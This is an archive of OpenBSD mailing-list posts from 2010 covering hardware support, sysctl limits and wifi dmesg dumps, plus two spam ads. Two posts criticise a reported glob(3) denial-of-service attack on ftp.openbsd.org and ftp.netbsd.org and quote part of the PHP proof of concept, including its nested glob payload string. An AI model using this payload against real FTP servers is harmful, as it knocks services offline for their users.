Re: what is the OpenBSd equivalent for kern.maxfilesperproc on OpenBSD?
On 7/2/10 1:25 AM, Siju George wrote: Hi, It is for Squid Optimizations from http://wiki.squid-cache.org/SquidFaq/SystemSpecificOptimizations Well your description is miss leading here. The text on that page said: ... increase the number of system-wide ... so, that would be # sysctl | grep kern.maxfiles kern.maxfiles=7030 and that is: # The maximum number of open files that may be open in the system. However, the name of the sysclt that your document refer at kern.maxfilesperproc=8192 Of files per process is set in login.conf and as an example: # Setting used by MySQL daemon mysql:\ :openfiles-cur=2048:\ :openfiles-max=3072:\ :tc=daemon: So, you set that up under the class you will use. man(5) login.conf So, depend what you really want to do, use the right place, or if you are not sure, then don't touch it. Best, Daniel thanks :-) Siju
Re: Mac mini G4
On my G4 I 've had no probles so far with gem(4). I have a 1.25GHz one. Maybe we can compare logs on this. However, my mini is not under any heavy network load. I have it as a DMZ host with snort enabled and a simple pf config. Nothing much.Just testing so far(7 days) On Fri, Jul 02, 2010 at 01:07:21AM -0400, Bryan Vyhmeister wrote: On Thu, Jul 1, 2010 at 4:02 PM, FUGU fugu...@gmail.com wrote: Also, while we are at it, does anyone know if openbsd supports the latest apple usb ethernet adapter? I see that the AXE(4) driver supports Apple USB Ethernet Adapter A1277 but no info on the latest one thanks... I wasn't aware that there was a new one. The old one works great. Since we are on the topic of ethernet, I was wondering if anyone has experienced the gem(4) driver having issues on a Mac mini G4. I have six Mac mini G4's of varying speeds. There are two 1.25 GHz, two 1.42 GHz, and two 1.5 GHz. I have had mixed results with the built-in gem(4). I first noticed the problem with one of the 1.25 GHz systems. With both identically configured, one of them would have the gem(4) interface drop out every few days and either 'sh /etc/netstart gem0' or a restart would restore connectivity. This was with OpenBSD/macppc 4.5 and earlier for sure but I believe 4.7 is the same because the 1.5 GHz system I just installed had trouble with gem(4) as well. Anyone have similar experiences? Bryan [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Current status of suspend AND resume on X200s
On Thu, Jul 01, 2010 at 08:27:04PM -0400, Ted Unangst wrote: On Thu, Jul 1, 2010 at 1:06 PM, Ted Unangst ted.unan...@gmail.com wrote: It works for me if you suspend from console, but not X. I made the following apm/suspend diff to make sure that happens. #!/bin/sh wsconsctl display.focus=1 sleep 5 This shouldn't be necessary, so a gold star to whoever fixes it. Paul fixed it, a gold star for him. Everything just works now. Good news everyone! A gold star to all of you :) I'll install a new snapshot after the hackathon as soon as it hits the mirrors. Not having to close/reopen 1k of browser tabs between lectures will be wonderful. Regards ahb
Re: MD5 checksum
On 2010-07-01, Claudiu Pruna clau...@net-go.net wrote: On Wed, 2010-06-30 at 16:21 -0600, Alexander Hall wrote: On 06/30/10 14:58, Claudiu Pruna wrote: Hi there, I have a question if I have one box running OpenBSD 4.7 and everytime I do md5 on one file I get different results, who is more succeptible to be broken ? cpu ? ram ? or mb. ? Thanks for your thoughts. If your system is indeed this corrupt I am surprised it will run at all. Please show the actual command that produces this. /Alexander the command is md5 file.iso and every run it gives another result. Claudiu Pretty much anything could be broken. RAM, power supply, motherboard, disk drive, CPU, cables, As a first step if you don't have spares to swap the various parts out (and assuming you want to spend the time to try and keep the system running), you could try reseating all connectors, clean RAM contacts with a pencil eraser, visually inspect the boards looking for swollen capacitors, etc...
Re: x4100
On 2010-07-01, Marco Peereboom ma...@peereboom.us wrote: It seems that the sun X4100 works now with amd64 GENERIC.MP. I'd like to get some test reports from folks in the field. You have to checkout a kernel using cvs because all niceness isn't in snaps yet. Thanks, /marco If someone has a non-M2 X2100 to spare, they should try it with amd64 MP to see if that is also fixed. (It doesn't need a dual core CPU to crash, just booting an MP kernel is enough...)
zyd on ASUS WL-159G - doesn't connect
Hello! I have an Asus R2H Tablet I'm trying OpenBSD on. It features a ZD1211B wireless chip onboard, which is noted as ASUS WL-159G module on the back side of the device. While being listed as known to work in manual it fails to associate with an open network I've connected right now on my another device. So the question is: what can I do about that? While I can't send out the dmesg right now, dmesg | grep zyd outputs just the initialization info, no errors. -- Dmitrij D. Czarkoff
Re: zyd on ASUS WL-159G - doesn't connect
Complete dmesg will be useful too in any case. sudo pcidump -v of your wifi will be fine too On Fri, Jul 2, 2010 at 1:31 PM, czark...@gmail.com wrote: Hello! I have an Asus R2H Tablet I'm trying OpenBSD on. It features a ZD1211B wireless chip onboard, which is noted as ASUS WL-159G module on the back side of the device. While being listed as known to work in manual it fails to associate with an open network I've connected right now on my another device. So the question is: what can I do about that? While I can't send out the dmesg right now, dmesg | grep zyd outputs just the initialization info, no errors. -- Dmitrij D. Czarkoff -- bIf youbre good at something, never do it for free.bB bThe Joker
UP 2 50% of Cell Phones, Laptop Computers, Desktop Computers, Tablet PCs, Camara Lens, Digital SLRs, TVs HDTVs, GPS Navigation, Home Theater Systems, Video Gaming, DJ Equipment, Moter
Dear #e-mail# We have been working on this site www.electricalretail.net and it is pretty good it has all the latest gadgets, from all the top names. All the products are orginal and myself and all the webteam were sent different items as gifts, I gave my laptop to Simon my eldest son. If you want to check the site out then you can find it at the following URL: www.electricalretail.net The have FREE courier service for orders over 200 Euros They have so many items, all top brand names under the following categories: Cell Phones, Tablet PC, Laptop Computers, Desktop Computers, Projectors, Camara Lens, Digital SLRs, TVs HDTVs, GPS Navigation, Home Theater Systems, Video Gaming, DJ Equipment, Motercycles, ATVs, Musical Instuments. Brands names include the following: Apple, Sony Ericssion, BlackBerry, Nokia, HTC, Samsung, LG, Motorola, Sony, Toshiba, HP, Acer, Asus, Dell, Fujitsu, IBM, MSI, Nikon, Canon Panasonic, Wii, Xbox 360, Nintendo DS, PlayStation. Regards,
Re: Mac mini G4
On Fri, Jul 2, 2010 at 2:50 AM, FUGU fugu...@gmail.com wrote: On my G4 I 've had no probles so far with gem(4). I have a 1.25GHz one. Maybe we can compare logs on this. However, my mini is not under any heavy network load. I have it as a DMZ host with snort enabled and a simple pf config. Nothing much.Just testing so far(7 days) I'll watch my logs again. I never could pin it down to anything in particular. It also seemed that either the Mac mini had the problem and it showed up within a couple of days even with light network traffic or it didn't have the problem at all. Your machine probably does not have the issue. Bryan
Re: MD5 checksum
Are you mixing different memory modules on the same machine? If that's the case, extract one and try the computer with one module at a time, just to discard RAM problems. Regards and good luck, Dani El 01/07/2010 12:15, Claudiu Pruna escribiC3: On Thu, 2010-07-01 at 10:32 +0300, Thanasis wrote: I had such a problem with under-volted RAM. The RAM (DDR2) needed to be manually set to 2.0 or 2.1 Volts (in BIOS). on 06/30/2010 11:58 PM Claudiu Pruna wrote the following: Hi there, I have a question if I have one box running OpenBSD 4.7 and everytime I do md5 on one file I get different results, who is more succeptible to be broken ? cpu ? ram ? or mb. ? Thanks for your thoughts. the computer is an PIII/450MHz: hw.machine=i386 hw.model=Intel Pentium III (GenuineIntel 686-class, 512KB L2 cache) hw.ncpu=1 hw.byteorder=1234 hw.pagesize=4096 hw.disknames=wd0,cd0 hw.diskcount=2 hw.cpuspeed=448 hw.vendor=Compaq hw.product=Deskpro EP/SB Series hw.physmem=268005376 hw.usermem=267993088 could it still be a ram voltage problem ? as it has sdram ?
Re: zyd on ASUS WL-159G - doesn't connect
Tomas Bodzar tomas.bod...@gmail.com wrote: Complete dmesg will be useful too in any case. sudo pcidump -v of your wifi will be fine too pcidump -v doesn't help because WL-159G is a usb dongle, so it doesn't show up on pcidump. OpenBSD 4.7 (GENERIC) #558: Wed Mar 17 20:46:15 MDT 2010 dera...@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Pentium(R) M processor 1.00GHz (GenuineIntel 686-class) 1 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,TM,SBF,EST,TM2 real mem = 1324707840 (1263MB) avail mem = 1274814464 (1215MB) mainbus0 at root bios0 at mainbus0: AT/286+ BIOS, date 10/16/07, BIOS32 rev. 0 @ 0xf0010, SMBIOS rev. 2.3 @ 0xf92f0 (36 entries) bios0: vendor American Megatrends Inc. version 208 date 10/16/2007 bios0: ASUSTeK Computer Inc. R2H acpi0 at bios0: rev 0 acpi0: tables DSDT FACP APIC MCFG SLIC OEMB HPET SSDT acpi0: wakeup devices LAN0(S4) P0P1(S4) USB1(S3) USB2(S3) USB3(S3) USB4(S3) EUSB(S3) MC97(S4) AZAL(S3) PWRB(S4) SLPB(S4) acpitimer0 at acpi0: 3579545 Hz, 24 bits acpimadt0 at acpi0 addr 0xfee0: PC-AT compat cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 99MHz ioapic0 at mainbus0: apid 1 pa 0xfec0, version 20, 24 pins acpihpet0 at acpi0: 14318179 Hz acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus -1 (P0P2) acpiprt2 at acpi0: bus 1 (P0P1) acpiprt3 at acpi0: bus 2 (P0P4) acpiprt4 at acpi0: bus -1 (P0P5) acpiprt5 at acpi0: bus -1 (P0P6) acpiprt6 at acpi0: bus -1 (P0P7) acpiec0 at acpi0 acpicpu0 at acpi0: C3, C2, C1, PSS acpitz0 at acpi0: critical temperature 105 degC acpiac0 at acpi0: AC unit offline acpibat0 at acpi0: BAT0 model R2-2134 serial type LIon oem ASUSTEK acpibtn0 at acpi0: PWRB acpibtn1 at acpi0: SLPB acpivideo0 at acpi0: VGA_ acpivout0 at acpivideo0: CRTD acpivout1 at acpivideo0: TVOD acpivout2 at acpivideo0: LCDD acpivideo1 at acpi0: VGA_ acpivout3 at acpivideo1: CRTD acpivout4 at acpivideo1: TVOD acpivout5 at acpivideo1: LCDD bios0: ROM list: 0xc/0xea00! cpu0: Enhanced SpeedStep 1078 MHz: speeds: 1000, 800, 600 MHz pci0 at mainbus0 bus 0: configuration mode 1 (bios) pchb0 at pci0 dev 0 function 0 Intel 82915GM Host rev 0x04 vga1 at pci0 dev 2 function 0 Intel 82915GM Video rev 0x04 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) intagp0 at vga1 agp0 at intagp0: aperture at 0xd000, size 0x1000 inteldrm0 at vga1: apic 1 int 16 (irq 11) drm0 at inteldrm0 Intel 82915GM Video rev 0x04 at pci0 dev 2 function 1 not configured azalia0 at pci0 dev 27 function 0 Intel 82801FB HD Audio rev 0x04: apic 1 int 16 (irq 11) azalia0: codecs: Analog Devices/0x1986 audio0 at azalia0 ppb0 at pci0 dev 28 function 0 Intel 82801FB PCIE rev 0x04: apic 1 int 16 (irq 11) pci1 at ppb0 bus 2 re0 at pci1 dev 0 function 0 Realtek 8101E rev 0x01: RTL8101E (0x3400), apic 1 int 16 (irq 11), address 00:1d:60:38:96:0e rlphy0 at re0 phy 7: RTL8201L 10/100 PHY, rev. 1 uhci0 at pci0 dev 29 function 0 Intel 82801FB USB rev 0x04: apic 1 int 23 (irq 5) uhci1 at pci0 dev 29 function 1 Intel 82801FB USB rev 0x04: apic 1 int 19 (irq 6) uhci2 at pci0 dev 29 function 2 Intel 82801FB USB rev 0x04: apic 1 int 18 (irq 3) uhci3 at pci0 dev 29 function 3 Intel 82801FB USB rev 0x04: apic 1 int 16 (irq 11) ehci0 at pci0 dev 29 function 7 Intel 82801FB USB rev 0x04: apic 1 int 23 (irq 5) usb0 at ehci0: USB revision 2.0 uhub0 at usb0 Intel EHCI root hub rev 2.00/1.00 addr 1 ppb1 at pci0 dev 30 function 0 Intel 82801BAM Hub-to-PCI rev 0xd4 pci2 at ppb1 bus 1 sdhc0 at pci2 dev 1 function 0 Ricoh 5C822 SD/MMC rev 0x19: apic 1 int 17 (irq 3) sdmmc0 at sdhc0 ichpcib0 at pci0 dev 31 function 0 Intel 82801FBM LPC rev 0x04: PM disabled pciide0 at pci0 dev 31 function 1 Intel 82801FB IDE rev 0x04: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility wd0 at pciide0 channel 0 drive 0: TOSHIBA MK8009GAH wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 5 pciide0: channel 1 disabled (no drives) usb1 at uhci0: USB revision 1.0 uhub1 at usb1 Intel UHCI root hub rev 1.00/1.00 addr 1 usb2 at uhci1: USB revision 1.0 uhub2 at usb2 Intel UHCI root hub rev 1.00/1.00 addr 1 usb3 at uhci2: USB revision 1.0 uhub3 at usb3 Intel UHCI root hub rev 1.00/1.00 addr 1 usb4 at uhci3: USB revision 1.0 uhub4 at usb4 Intel UHCI root hub rev 1.00/1.00 addr 1 isa0 at ichpcib0 isadma0 at isa0 com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo pckbc0 at isa0 port 0x60/5 pckbd0 at pckbc0 (kbd slot) pckbc0: using irq 1 for kbd slot wskbd0 at pckbd0: console keyboard, using wsdisplay0 pms0 at pckbc0 (aux slot) pckbc0: using irq 12 for aux slot wsmouse0 at pms0 mux 0 pcppi0 at isa0 port 0x61 midi0 at pcppi0: PC speaker spkr0 at pcppi0 npx0 at isa0 port 0xf0/16: reported by CPUID; using exception 16 mtrr: Pentium Pro MTRR support ugen0 at uhub0 port 1 Syntek USB2.0 rev
Re: Which netbook for OpenBSD
Le 28/06/2010 08:41, b...@brodewicz.pl a C)crit : Hi. I'm planning to buy a netbook and I wonder which one is the best choice for running OpenBSD? Any sugestion? Thanks hi, I've just buy a Samsung N210. for now i need to run -current because i wasn't able to run X properly on -stable all seem's to be OK see below : a dmesg with GENERIC kernel a dmesg with GENERIC.MP kernel the result of 'sysctl hw.sensors' OpenBSD 4.7-current (GENERIC) #43: Mon Jun 28 14:21:08 MDT 2010 dera...@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Atom(TM) CPU N450 @ 1.66GHz (GenuineIntel 686-class) 1.67 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,EST,TM2,SSSE3,CX16,xTPR,PDCM,MOVBE real mem = 1062490112 (1013MB) avail mem = 1035993088 (988MB) mainbus0 at root bios0 at mainbus0: AT/286+ BIOS, date 03/17/10, BIOS32 rev. 0 @ 0xfdc86, SMBIOS rev. 2.5 @ 0xdf010 (29 entries) bios0: vendor Phoenix Technologies Ltd. version 07JI.M065.20100317.JIP date 03/17/2010 bios0: SAMSUNG ELECTRONICS CO., LTD. N150/N210/N220 acpi0 at bios0: rev 2 acpi0: tables DSDT FACP MCFG HPET APIC BOOT SLIC SSDT SSDT SSDT acpi0: wakeup devices EXP1(S4) EXP2(S4) EXP3(S4) EXP4(S4) PCIB(S3) USB1(S3) USB2(S3) USB3(S3) USB4(S3) EUSB(S3) PWRB(S4) acpitimer0 at acpi0: 3579545 Hz, 24 bits acpihpet0 at acpi0: 14318179 Hz acpimadt0 at acpi0 addr 0xfee0: PC-AT compat cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 166MHz cpu at mainbus0: not configured ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus 5 (EXP1) acpiprt2 at acpi0: bus 7 (EXP2) acpiprt3 at acpi0: bus 9 (EXP3) acpiprt4 at acpi0: bus 11 (EXP4) acpiprt5 at acpi0: bus 17 (PCIB) acpiec0 at acpi0 acpicpu0 at acpi0: C1, PSS acpitz0 at acpi0: critical temperature 98 degC acpibat0 at acpi0: BAT1 type LION oem SAMSUNG Electronics acpiac0 at acpi0: AC unit offline acpibtn0 at acpi0: LID0 acpibtn1 at acpi0: PWRB acpibtn2 at acpi0: SLPB acpivideo0 at acpi0: IGD0 acpivout0 at acpivideo0: DD01 acpivout1 at acpivideo0: DD02 acpivout2 at acpivideo0: DD03 acpivout3 at acpivideo0: DD04 acpivout4 at acpivideo0: DD05 bios0: ROM list: 0xc/0xda00! 0xdf000/0x1000! cpu0: Enhanced SpeedStep 1979 MHz: speeds: 1667, 1333, 1000 MHz pci0 at mainbus0 bus 0: configuration mode 1 (bios) pchb0 at pci0 dev 0 function 0 Intel Pineview DMI rev 0x00 vga1 at pci0 dev 2 function 0 Intel Pineview Video rev 0x00 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) intagp0 at vga1 agp0 at intagp0: aperture at 0xd000, size 0x1000 inteldrm0 at vga1: apic 2 int 16 (irq 11) drm0 at inteldrm0 Intel Pineview Video rev 0x00 at pci0 dev 2 function 1 not configured azalia0 at pci0 dev 27 function 0 Intel 82801GB HD Audio rev 0x02: apic 2 int 22 (irq 7) azalia0: codecs: Realtek ALC269 audio0 at azalia0 ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x02: apic 2 int 16 (irq 11) pci1 at ppb0 bus 5 athn0 at pci1 dev 0 function 0 Atheros AR9285 rev 0x01: apic 2 int 16 (irq 11), address b4:82:fe:70:f7:b4 athn0: AR9285 rev 2 (1T1R), ROM rev 14 ppb1 at pci0 dev 28 function 1 Intel 82801GB PCIE rev 0x02: apic 2 int 17 (irq 4) pci2 at ppb1 bus 7 ppb2 at pci0 dev 28 function 2 Intel 82801GB PCIE rev 0x02: apic 2 int 18 (irq 3) pci3 at ppb2 bus 9 mskc0 at pci3 dev 0 function 0 Marvell Yukon 88E8040 rev 0x00, Yukon-2 FE+ rev. A0 (0x0): apic 2 int 18 (irq 3) msk0 at mskc0 port A: address 00:24:54:6d:5e:8d eephy0 at msk0 phy 0: 88E3016 10/100 PHY, rev. 0 ppb3 at pci0 dev 28 function 3 Intel 82801GB PCIE rev 0x02: apic 2 int 19 (irq 10) pci4 at ppb3 bus 11 uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x02: apic 2 int 23 (irq 5) uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x02: apic 2 int 19 (irq 10) uhci2 at pci0 dev 29 function 2 Intel 82801GB USB rev 0x02: apic 2 int 18 (irq 3) uhci3 at pci0 dev 29 function 3 Intel 82801GB USB rev 0x02: apic 2 int 16 (irq 11) ehci0 at pci0 dev 29 function 7 Intel 82801GB USB rev 0x02: apic 2 int 23 (irq 5) usb0 at ehci0: USB revision 2.0 uhub0 at usb0 Intel EHCI root hub rev 2.00/1.00 addr 1 ppb4 at pci0 dev 30 function 0 Intel 82801BAM Hub-to-PCI rev 0xe2 pci5 at ppb4 bus 17 pcib0 at pci0 dev 31 function 0 Intel Tigerpoint LPC rev 0x02 ahci0 at pci0 dev 31 function 2 Intel 82801GR AHCI rev 0x02: apic 2 int 19 (irq 10), AHCI 1.1 ahci0: PHY offline on port 2 ahci0: PHY offline on port 3 scsibus0 at ahci0: 32 targets sd0 at scsibus0 targ 0 lun 0: ATA, Hitachi HTS54502, PB2O SCSI3 0/direct fixed sd0: 238475MB, 512 bytes/sec, 488397168 sec total ichiic0 at pci0 dev 31 function 3 Intel 82801GB SMBus rev 0x02: apic 2 int 19 (irq 10) iic0 at ichiic0 spdmem0 at iic0 addr 0x50: 1GB DDR2 SDRAM non-parity PC2-6400CL5 SO-DIMM usb1 at uhci0: USB revision 1.0 uhub1 at usb1 Intel UHCI root hub rev
Re: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
It's rather astonishing what attempts to passfor a credible security advisory today. oh, I made a lot of connections to the site and they blocked me. Thank you, Maksymillian, for showing us all that you can execute a denial of service attack from 90.156.82.13. I wonder how many connections his site supports to his services. perhaps some similar security expert can test his connection rate and let us all know. # traceroute -n 90.156.82.13 traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets 1 129.128.5.2 6.906 ms 0.818 ms 1.444 ms 2 129.128.3.194 0.306 ms 0.303 ms 0.306 ms 3 129.128.3.130 0.345 ms 0.502 ms 0.656 ms 4 129.128.3.170 0.502 ms 0.726 ms 1.443 ms 5 64.42.209.114 5.628 ms 5.562 ms 5.272 ms 6 216.18.32.13 6.337 ms 5.676 ms 5.752 ms 7 66.59.190.198 18.936 ms 19.18 ms 18.523 ms 8 66.59.190.18 18.384 ms 18.659 ms 18.426 ms 9 67.69.199.105 17.797 ms 17.785 ms 18.111 ms 10 64.86.115.13 17.369 ms 17.651 ms 17.175 ms 11 216.6.98.29 68.828 ms 69.162 ms 69.146 ms 12 216.6.57.9 87.943 ms 87.828 ms 87.879 ms 13 195.219.69.29 175.930 ms 176.47 ms 175.804 ms 14 195.219.69.2 189.366 ms 176.757 ms 179.460 ms 15 195.219.180.6 193.562 ms 197.755 ms 197.880 ms 16 195.219.246.2 181.461 ms 201.536 ms 179.635 ms 17 83.238.251.56 177.432 ms 177.971 ms 177.115 ms 18 83.238.250.38 189.741 ms 190.70 ms 189.646 ms 19 83.238.250.12 191.123 ms 193.99 ms 192.135 ms 20 83.238.251.41 189.843 ms 189.805 ms 189.245 ms 21 87.204.248.202 188.981 ms 189.167 ms 459.987 ms 22 87.99.33.90 190.739 ms 190.637 ms 190.955 ms 23 87.99.32.202 190.180 ms 190.271 ms 190.160 ms 24 90.156.82.13 289.39 ms 331.276 ms 319.419 ms ^C # host 90.156.82.13 13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl. # On 2 July 2010 15:47, Theo de Raadt dera...@cvs.openbsd.org wrote: OK, I am letting the maintainer of the site know, at the University Campus that you have just executed a denial of service against. I am surprised that you would go out of your way to declare so freely that you have purposely participated in a denial of service. Return-Path: c...@securityreason.com Delivery-Date: Fri Jul 2 15:38:24 2010 Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163]) by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472 (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL) for dera...@cvs.openbsd.org; Fri, 2 Jul 2010 15:38:24 -0600 (MDT) Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8]) by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931 for dera...@openbsd.org; Fri, 2 Jul 2010 15:38:17 -0600 (MDT) Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1]) by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70) id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200 Message-ID: 4c2e4e40.4080...@securityreason.com Date: Fri, 02 Jul 2010 22:38:24 +0200 From: Maksymilian Arciemowicz c...@securityreason.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) Gecko/20100512 Thunderbird/3.0.5 MIME-Version: 1.0 To: dera...@openbsd.org, secur...@openbsd.org Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org X-Enigmail-Version: 1.0.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ?php /* Libc/glob(3) denial-of-service Maksymilian Arciemowicz from SecurityReason.com This script has been used to attack ftp.openbsd.org and ftp.netbsd.org Result (ftp.openbsd.org): - - Connection refused and in the end # telnet ftp.openbsd.org 21 Trying 129.128.5.191... Connected to ftp.openbsd.org. Escape character is '^]'. 421- If you are seeing this message you have been blocked from using 421- this ftp server - most likely for mirroring content without paying 421- attention to what you were mirroring or where you should be mirroring 421- it from, or for excessive connection rates. 421- OpenBSD should *NOT* be mirrored from here, you should use 421- a second level mirror as described in http://www.openbsd.org/ftp.html 421 Connection closed by foreign host. # ;] Result (ftp.netbsd.org): - - no more access for anonymous On 02.07.2010 20:29 CET, ftp.netbsd.org has return: 530 User ftp access denied, connection limit of 160 reached. Affter attack from one host */ $conf['host']= $argv[1] ? $argv[1] : HOST; $conf['user'] =$argv[2] ? $argv[2] : anonymous; $conf['pass'] =$argv[3] ? $argv[3] : m...@cxib.net; $conf['port']= $argv[4] ? $argv[4] : 21; $dirnames=array('A', 'B', 'C', 'D', 'E','F','G','H','I','J','K','M','N','O','P'); $pathsent={..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{ ..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c x; // fts_levelsumary $fts_level=2;
Re: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
I know how to google for nmap!! Can I be a security expert too??? Pretty please! :) - paid professional paranoid On 7/2/10, Bob Beck b...@ualberta.ca wrote: It's rather astonishing what attempts to passfor a credible security advisory today. oh, I made a lot of connections to the site and they blocked me. Thank you, Maksymillian, for showing us all that you can execute a denial of service attack from 90.156.82.13. I wonder how many connections his site supports to his services. perhaps some similar security expert can test his connection rate and let us all know. # traceroute -n 90.156.82.13 traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets 1 129.128.5.2 6.906 ms 0.818 ms 1.444 ms 2 129.128.3.194 0.306 ms 0.303 ms 0.306 ms 3 129.128.3.130 0.345 ms 0.502 ms 0.656 ms 4 129.128.3.170 0.502 ms 0.726 ms 1.443 ms 5 64.42.209.114 5.628 ms 5.562 ms 5.272 ms 6 216.18.32.13 6.337 ms 5.676 ms 5.752 ms 7 66.59.190.198 18.936 ms 19.18 ms 18.523 ms 8 66.59.190.18 18.384 ms 18.659 ms 18.426 ms 9 67.69.199.105 17.797 ms 17.785 ms 18.111 ms 10 64.86.115.13 17.369 ms 17.651 ms 17.175 ms 11 216.6.98.29 68.828 ms 69.162 ms 69.146 ms 12 216.6.57.9 87.943 ms 87.828 ms 87.879 ms 13 195.219.69.29 175.930 ms 176.47 ms 175.804 ms 14 195.219.69.2 189.366 ms 176.757 ms 179.460 ms 15 195.219.180.6 193.562 ms 197.755 ms 197.880 ms 16 195.219.246.2 181.461 ms 201.536 ms 179.635 ms 17 83.238.251.56 177.432 ms 177.971 ms 177.115 ms 18 83.238.250.38 189.741 ms 190.70 ms 189.646 ms 19 83.238.250.12 191.123 ms 193.99 ms 192.135 ms 20 83.238.251.41 189.843 ms 189.805 ms 189.245 ms 21 87.204.248.202 188.981 ms 189.167 ms 459.987 ms 22 87.99.33.90 190.739 ms 190.637 ms 190.955 ms 23 87.99.32.202 190.180 ms 190.271 ms 190.160 ms 24 90.156.82.13 289.39 ms 331.276 ms 319.419 ms ^C # host 90.156.82.13 13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl. # On 2 July 2010 15:47, Theo de Raadt dera...@cvs.openbsd.org wrote: OK, I am letting the maintainer of the site know, at the University Campus that you have just executed a denial of service against. I am surprised that you would go out of your way to declare so freely that you have purposely participated in a denial of service. Return-Path: c...@securityreason.com Delivery-Date: Fri Jul 2 15:38:24 2010 Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163]) by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472 (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL) for dera...@cvs.openbsd.org; Fri, 2 Jul 2010 15:38:24 -0600 (MDT) Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8]) by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931 for dera...@openbsd.org; Fri, 2 Jul 2010 15:38:17 -0600 (MDT) Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1]) by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70) id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200 Message-ID: 4c2e4e40.4080...@securityreason.com Date: Fri, 02 Jul 2010 22:38:24 +0200 From: Maksymilian Arciemowicz c...@securityreason.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) Gecko/20100512 Thunderbird/3.0.5 MIME-Version: 1.0 To: dera...@openbsd.org, secur...@openbsd.org Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org X-Enigmail-Version: 1.0.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ?php /* Libc/glob(3) denial-of-service Maksymilian Arciemowicz from SecurityReason.com This script has been used to attack ftp.openbsd.org and ftp.netbsd.org Result (ftp.openbsd.org): - - Connection refused and in the end # telnet ftp.openbsd.org 21 Trying 129.128.5.191... Connected to ftp.openbsd.org. Escape character is '^]'. 421- If you are seeing this message you have been blocked from using 421- this ftp server - most likely for mirroring content without paying 421- attention to what you were mirroring or where you should be mirroring 421- it from, or for excessive connection rates. 421- OpenBSD should *NOT* be mirrored from here, you should use 421- a second level mirror as described in http://www.openbsd.org/ftp.html 421 Connection closed by foreign host. # ;] Result (ftp.netbsd.org): - - no more access for anonymous On 02.07.2010 20:29 CET, ftp.netbsd.org has return: 530 User ftp access denied, connection limit of 160 reached. Affter attack from one host */ $conf['host']= $argv[1] ? $argv[1] : HOST; $conf['user'] =$argv[2] ? $argv[2] : anonymous; $conf['pass'] =$argv[3] ? $argv[3] : m...@cxib.net; $conf['port']= $argv[4] ? $argv[4] : 21; $dirnames=array('A', 'B', 'C', 'D',
no Chroot in Match Block of sshd?
/etc/ssh/sshd_config: line 119: Bad configuration option: ChrootDirecotry /etc/ssh/sshd_config line 119: Directive 'ChrootDirecotry' is not allowed within a Match block I KNOW I've done this in the recent past. When/why did it change?? -- devin
Very-fashion.com -Novo! Brendirana garderoba po najpovoljnijim cenama.Bisou Bisou -70%, Didier Parakian -60%, Leslie Monte carlo -50%
